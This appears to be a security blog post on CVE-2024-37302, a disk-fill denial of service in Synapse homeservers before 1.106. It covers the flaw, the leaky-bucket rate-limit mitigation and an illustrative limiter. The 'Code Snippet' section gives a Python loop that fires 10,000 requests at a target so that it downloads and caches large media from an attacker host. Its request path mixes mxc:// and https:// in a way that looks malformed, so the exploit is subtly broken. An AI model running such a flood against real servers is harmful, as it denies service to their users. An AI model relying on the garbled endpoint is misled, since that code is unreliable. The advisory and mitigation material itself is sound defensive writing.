Synapse, an open-source Matrix homeserver, is vulnerable to a disk fill attack in versions prior to 1.106. An unauthenticated adversary can exploit this vulnerability to compel Synapse to download and cache substantial amounts of remote media. The default rate limit strategy is inadequate against this, and the result is a denial of service that can range from failed media uploads and downloads to complete unavailability of the Synapse process.
This post will discuss the details of this vulnerability, how an attacker can exploit it, and the possible consequences. The post also includes information on the partial mitigation introduced in Synapse 1.106 with a new "leaky bucket" rate limit on remote media downloads.
*Original References*
Link 1: Synapse GitHub Repository
Link 2: Synapse Release Notes (1.106)
Link 3: CVE-2024-37302 Vulnerability Details
Exploit Details
An attacker can take advantage of this vulnerability by sending numerous requests for large media files hosted on remote servers, each of which the vulnerable Synapse homeserver downloads and caches on local disk. The default rate limiting strategy does not contain this traffic, so the disk can fill in a relatively short amount of time.
Code Snippet
The following Python code snippet demonstrates how an unauthenticated attacker might launch a disk fill attack:
import requests

TARGET_SERVER = "https://target.synapse.server"
REMOTE_MEDIA_URL = "https://malicious.server/large_media_file"

# Ask the target homeserver to fetch (and cache) the same remote media 10,000 times,
# varying a query parameter on each request.
for i in range(10000):
    requests.get(f"{TARGET_SERVER}/_matrix/media/v1/mxc://{REMOTE_MEDIA_URL}?i={i}")
This script sends 10,000 GET requests to the target Synapse server, each asking it to download a large media file from a remote server. Each request carries a different value of the i query parameter so that the requests are not all served from a cache.
Partial Mitigation in Synapse 1.106
Synapse version 1.106 introduces a partial mitigation for this vulnerability. The new "leaky bucket" rate limit strategy bounds the amount of remote media a single requester can have fetched within a given period. Although it does not fully address the issue, this partial mitigation limits an unauthenticated user's ability to force extensive amounts of data to be cached.
Synapse administrators can configure the "leaky bucket" rate limit settings in the homeserver.yaml configuration file by updating the rc_remote_media section:
rc_remote_media:
  per_second: 10
  burst_count: 50
With these settings, the server allows ten media downloads per second and a burst count of 50.
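To make the effect of these two parameters concrete, here is an added per-requester leaky-bucket limiter (illustrative code written for this post, not Synapse's own implementation). It treats per_second as the drain rate and burst_count as the bucket capacity, keeps time in integer milliseconds and the fill level in thousandths of a download so the arithmetic stays exact, and simulates a flood from a single constructed client address:

```python
from dataclasses import dataclass
from typing import Dict

SCALE = 1000  # bucket level is kept in thousandths of a download so integer math stays exact


@dataclass
class LeakyBucket:
    per_second: int   # drain rate: downloads per second (the page's per_second)
    burst_count: int  # capacity: maximum pending downloads (the page's burst_count)
    level: int = 0    # current fill, scaled by SCALE
    last_ms: int = 0  # time of last update, milliseconds

    def allow(self, now_ms: int, cost: int = 1) -> bool:
        # Drain what leaked since the last update: ms * downloads/s = thousandths of a download.
        elapsed = max(0, now_ms - self.last_ms)
        self.level = max(0, self.level - elapsed * self.per_second)
        self.last_ms = now_ms
        if self.level + cost * SCALE > self.burst_count * SCALE:
            return False  # would overflow: refuse before any remote fetch or caching happens
        self.level += cost * SCALE
        return True

class RemoteMediaLimiter:
    """One bucket per requester key (client IP for unauthenticated requests)."""

    def __init__(self, per_second: int, burst_count: int) -> None:
        self.per_second, self.burst_count = per_second, burst_count
        self.buckets: Dict[str, LeakyBucket] = {}

    def allow(self, requester: str, now_ms: int) -> bool:
        bucket = self.buckets.setdefault(
            requester, LeakyBucket(self.per_second, self.burst_count, last_ms=now_ms))
        return bucket.allow(now_ms)

def simulate_flood(per_second: int, burst_count: int,
                   requests: int, interval_ms: int) -> Dict[str, int]:
    """Constructed scenario: one requester (203.0.113.7, a documentation address)
    fires `requests` download requests `interval_ms` apart; returns admit/reject counts."""
    limiter = RemoteMediaLimiter(per_second, burst_count)
    counts = {"admitted": 0, "rejected": 0}
    for i in range(requests):
        ok = limiter.allow("203.0.113.7", now_ms=i * interval_ms)
        counts["admitted" if ok else "rejected"] += 1
    return counts

if __name__ == "__main__":
    # The page's 10/s, burst 50 against 1,000 requests at 20/s: the burst is absorbed, then only 10/s pass.
    print(simulate_flood(10, 50, 1000, 50))  # {'admitted': 549, 'rejected': 451}
```

Without the limiter every one of the 1,000 requests would reach the remote server and land in the media cache; with it, roughly the burst plus the drain rate times the elapsed time gets through, which is what bounds the disk growth per requester.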
Conclusion
CVE-2024-37302 is a severe vulnerability in Synapse versions before 1.106: an unauthenticated attacker can cause a disk fill by making the server download and cache considerable amounts of remote media. The issue remains only partly resolved, and administrators are advised to apply the partial mitigation provided in Synapse 1.106 with the "leaky bucket" rate limit.
To keep their Synapse homeserver secure, administrators should stay current with Synapse security patches and releases, and monitor the server for abnormal behavior or excessive resource usage, in particular unexpected growth of the media store.
Timeline
Published on: 12/03/2024 17:15:10 UTC